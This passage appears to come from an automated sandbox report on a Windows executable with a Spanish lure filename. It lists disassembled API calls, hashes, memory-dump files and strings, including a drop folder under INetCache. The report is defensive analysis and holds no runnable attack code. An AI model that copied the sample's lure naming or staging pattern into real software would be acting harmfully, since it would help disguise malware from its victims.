                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: dffe1429d4050f1f12f5951f55831759b2beb43ad3b1e2ff8886794f17acb97d
                                                • Instruction ID: 8e321c80e88a1319f2525a3d5ae6c8193a45d3eb8196d3f8087198c45f82dbda
                                                • Opcode Fuzzy Hash: dffe1429d4050f1f12f5951f55831759b2beb43ad3b1e2ff8886794f17acb97d
                                                • Instruction Fuzzy Hash: 05D05E73B141048BD720DBB8BE8585E73A8EB403193218837D402E1191E6B8C8524628
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                • GlobalFree.KERNEL32(?), ref: 0040511D
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                • InvalidateRect.USER32(?,00000000,?), ref: 0040526E
                                                • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                • ShowWindow.USER32(00000000), ref: 004052CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
                                                • lstrcatW.KERNEL32(?,Call), ref: 004048E4
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
                                                  • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                  • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                  • Part of subcall function 004064A6: CharPrevW.USER32(?,?,758E3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 004049B9
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                  • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                  • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                  • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: (7B$A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable$Call
                                                • API String ID: 2624150263-118744990
                                                • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                • GlobalFree.KERNEL32(?), ref: 10001D83
                                                • GlobalFree.KERNEL32(?), ref: 10001D88
                                                • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID:
                                                • API String ID: 4227406936-0
                                                • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                APIs
                                                • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                Strings
                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable, xrefs: 004021C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sundhedsstyrelsens\ruttiest\rentable
                                                • API String ID: 542301482-629450151
                                                • Opcode ID: 0519aca3a68a9cf68f5a6bf32b8fcb60afd388f437e2041e453cdf2473d95122
                                                • Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
                                                • Opcode Fuzzy Hash: 0519aca3a68a9cf68f5a6bf32b8fcb60afd388f437e2041e453cdf2473d95122
                                                • Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040288D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 58610e95729055a9165323d133a092269c39768998a2b5c230b5dd1e10f9a37f
                                                • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                • Opcode Fuzzy Hash: 58610e95729055a9165323d133a092269c39768998a2b5c230b5dd1e10f9a37f
                                                • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404511
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404542
                                                • GetSysColor.USER32(?), ref: 00404553
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                • lstrlenW.KERNEL32(?), ref: 00404574
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                • SendMessageW.USER32(00000000), ref: 004045F6
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                • SetCursor.USER32(00000000), ref: 00404675
                                                • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,?), ref: 0040468A
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                • SetCursor.USER32(00000000), ref: 00404699
                                                • SendMessageW.USER32(00000111,?,00000000), ref: 004046C8
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                • String ID: Call$N$open$C@
                                                • API String ID: 3615053054-3980584120
                                                • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                APIs
                                                • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,004060D4,?,?), ref: 00405F50
                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,004060D4,?,?), ref: 00405F74
                                                • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                  • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                • wsprintfA.USER32 ref: 00405FB8
                                                • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                  • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00405DEB
                                                  • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                • String ID: %ls=%ls$NUL$[Rename]
                                                • API String ID: 222337774-899692902
                                                • Opcode ID: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                • Instruction ID: 33b5be0cf5b447351be1faad876236776c79ee828f4547529858959512194336
                                                • Opcode Fuzzy Hash: b79c81f05b1b833d126071e3cf8f1dbc038624686787cc5f02dad872694d8803
                                                • Instruction Fuzzy Hash: 6F3126702407147FC220AB219D09F6B3A9CEF45798F16003BF942F62D2DA7CD8218ABD
                                                APIs
